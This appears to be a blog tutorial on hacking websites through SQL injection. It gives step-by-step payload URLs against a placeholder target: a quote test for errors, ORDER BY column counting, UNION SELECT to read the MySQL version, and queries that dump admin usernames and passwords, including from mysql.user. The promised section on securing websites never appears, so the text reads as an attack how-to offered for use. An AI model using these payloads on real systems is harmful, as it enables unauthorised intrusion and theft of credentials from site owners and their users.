In this modern era, internet have become the internet of things. It’s all because of world wide web. Information is shared over internet through websites. Websites have completely changed the direction of information world. Businesses are getting online, banking is happening over internet. This just have widen the information area. Besides this, it also has opened a way of threat to information. It made a risk to confidential information as a result of cyber attacks. There are hundreds of ways to compromise security as not a single system is breach-proof. So, I am gonna show in this article, how websites can be hacked very easily and how to secure them. In this article, I will discuss the most popular way to hack a website through SQL injection.
How to hack a website through SQL injection?
SQL is the Structured Query Language used for the databases. In this attack, attacker figures out errors of SQL through browser and after finding a error, he hits that error to exploit attack. These errors are basically known as vulnerabilities. So, attacker finds out vulnerability in a website and exploit to perform different actions.
1. Finding out the vulnerability
Let’s say we have a site like this,
Now to test it, we need to add single quote mark at the end of the URL and hit enter like below.
If we find an SQL error on the page as “You have an error in SQL syntax. Check manual of your MySQL server version.” It may be a little different, but it’ll be SQL relevant error showing that it have some sort of SQL issue. It means, our target is vulnerable to SQL injection.
2. Finding out the Columns
In order to find out columns, we simply need to use Order by statement. It tells the database to order the results. Let’s see how to do it.
http://www.target.com/page.php?id=1 order by 1– (We found no error here, so we’ll change this 1 with 2 now.)
http://www.target.com/page.php?id=1 order by 2– (Still no error)
http://www.target.com/page.php?id=1 order by 3– (Found error like column 3 unknown.)
This means, it have 2 number of columns.
3. Check for Union and MySQL Version
With union function, we can select multiple database columns. How it looks like,
http://www.target.com/page.php?id=1 union all select 1,2– ( as we already have found the number of columns are 2.)
If we see some numbers over screen like 1 or 2. Let’s say it shows number 2 on screen. We need to replace the number of column that appeared on screen with @@version
http://www.target.com/page.php?id=1 union all select 1,@@version–
If we get error of union + illegal mix of collations, we need to hex and unhex functions.
http://www.target.com/page.php?id=1 union all select 1,unhex(hex(@@version))–
It’ll show MySQL version name like 4.1.2 etc. Now we need to find out the table names.
4. Check for Table Names and Column Names
We need to find out the table name by a little guessing like user, member and admin.
http://www.target.com/page.php?id=1 union all select 1,2 from admin–
http://www.target.com/page.php?id=1 union all select 1,username from admin– (if column name username doesn’t work, try any other like user, member etc).
Username displayed on screen. Now we need to check for the password column.
http://www.target.com/page.php?id=1 union all select 1,concat(username,0x3a,password) from admin–
Now we get username and password displayed on the screen as admin:admin or admin:password or anything like that.
If you can’t figure out the table name, you can use default command of MySQL.
http://www.target.com/page.php?id=1 union all select 1,concat(username,0x3a,password) from mysql.user–
That’s all for now, hope you got how to hack a website through SQL injection. If you encounter any problem, feel free to comment below. Cheers..:)